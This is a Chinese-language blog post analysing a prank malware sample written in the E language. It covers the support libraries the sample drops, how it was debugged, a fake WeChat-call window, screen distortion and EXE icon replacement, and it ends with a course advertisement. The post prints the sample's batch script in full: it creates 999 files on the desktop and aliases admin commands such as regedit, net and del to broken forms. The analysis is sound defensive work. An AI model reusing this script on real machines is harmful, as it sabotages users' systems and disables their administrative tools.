由于一直没怎么分析过易语言的样本,想学习一下易语言的样本分析过程,正好最近碰见了一个易语言编写的样本,是一个专门针对人类高质量女性进行钓鱼的样本,正好拿来学习学习,笔者是一边学习一边分析,如有不对之处还望各位批评指正。
该样本图标如下:
好像和前段时间流行的某人类高质量男性留着一样的发型?查看详细信息发现文件说明处还专门指出“高质量女性请运行”:
要分析清楚易语言,首先得大概了解一下易语言程序怎么开发,怎么编译,易语言是一款中文编程语言,它通过封装一些支持库来拓展自身的功能。如下是一个demo:
易语言有两种主要的编译方式:
独立编译:是指易语言编译时,程序和易语言的支持库打包在一个exe文件中。程序可以脱离易语言环境使用。
非独立编译:是指易语言编译时,单独编译exe文件,这样生成的文件体积小。必须带上支持库才能使用程序。
如果依赖库不存在将会弹出报错窗口:
那么有了上述知识,我们就可以判断这个样本是哪种编译方式了,拖入Ida首先发现样本会在Temp临时目录创建以E_N开头的文件夹,并释放一些后缀名为.fnr和.fne的PE文件。
调用LoadLibrary和GetProcessAddress函数,加载支持库文件,获取GetNewSock的函数地址:
然后发现后面会调用call eax和MessageBox:
这些都是易语言加载支持库的一些特征,该样本使用的是独立编译,接下来我们直接进行动态分析。
样本动态分析我们使用火绒剑结合OD进行动态调试分析,对一些关键的API下断点,如CreateFileA,MessageBoxA,CreateProcessA,CreateWindowExA等,于是我们就可以发现除了krnln.fnr还释放了其他的支持库文件:
其中eAPI.fne是应用接口支持库,iext.fne是拓展界面支持库,krnln.fnr是系统核心支持库,shell.fne是操作系统界面功能支持库,spec.fne是特殊功能支持库,mp3.run、com.run、wmp.dll对应的是Windows媒体播放器支持库。看来这个样本可能会播放音频或者视频。继续运行发现:
同时还释放并运行一个bat文件:
dc.bat内容为:
@echo off
cd c:\users\%username%\desktop\
for /L %%X IN (1,1,999) DO type nul>人类高质量男性%%X.txt
doskey regedit=regedit.
doskey gpedit.msc= gpedit.Msc.
doskey gpedit= gpedit.Msc.
doskey net=net.
doskey mmc = mmc.
doskey mmc.exe = mmc.
doskey assoc=assoc.
doskey ftype=ftype.
doskey del = del.
doskey delete = del.
doskey RD = rd.运行后桌面会出现999个txt文件:
同时,temp目录下还释放了如下文件:
然后出现如下类似微信电话的窗口:
当点击接听的时候便会播放音频和视频:
对于窗口所触发的行为我们可以使用OD的窗口界面:
在按钮处设置消息断点,当发生对应的事件时即可断在消息处理函数处。
然后便退出了。
其中当点击拒接微信电话时,便会出现恶搞现象,电脑屏幕出现“分块”现象,同时播放wallpaper.mp4:
还会像熊猫烧香一样将所有的exe文件图标全部修改:
这些功能主要是由释放出的FZ%.exe实现的,感兴趣的可以找我索要样本,继续分析一下,但一定要在虚拟机下运行,提前做好快照备份。
实验推荐
恶意代码分析实战-初级:http://mrw.so/5JSgbd恶意代码分析实战系列课程旨在通过针对一系列恶意代码的研究,帮助大家掌握分析技术,了解恶意代码是如何实现其相应的功能。课程分为初、中、高三部分,本课程为系列课程的初级部分,主要侧重点在与学习基础的静态分析技术、动态分析技术以及两者的结合,课程会涉及注册表分析、网络行为分析、主机行为分析等,期间会涉及到汇编语言、C语言、C&C通信、COM对象组件等知识以及各类安全软件的使用。
戳“阅读原文”体验免费靶场!
